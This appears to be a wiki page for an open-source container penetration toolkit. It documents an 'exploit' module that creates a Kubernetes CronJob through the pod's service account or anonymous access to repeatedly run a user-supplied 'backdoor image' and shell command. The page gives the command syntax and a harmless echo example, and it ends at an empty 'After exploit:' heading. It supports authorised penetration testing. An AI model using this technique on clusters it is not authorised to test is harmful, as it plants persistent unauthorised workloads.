-
Notifications
You must be signed in to change notification settings - Fork 551
Exploit: k8s cronjob
cdxy edited this page Jan 20, 2021
·
1 revision
Create K8s CronJob to run user-specified image and cmd.
部署K8s CronJob定时创建用户指定的image并运行cmd。
cdk run k8s-cronjob (default|anonymous|<service-account-token-path>) (min|hour|day|<cron-expr>) <image> <args>
Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.
Cron Options:
min: deploy cronjob with schedule "* * * * *"
hour: deploy cronjob with schedule "0 * * * *"
day: deploy cronjob with schedule "0 0 * * *"
<cron-expr>: your custom cron expression
Exploit Options:
<image>: your backdoor image (you can upload it to dockerhub before)
<args>: your custom shell command which will run when container creates
./cdk run k8s-cronjob default min alpine "echo hellow;echo cronjob"
After exploit: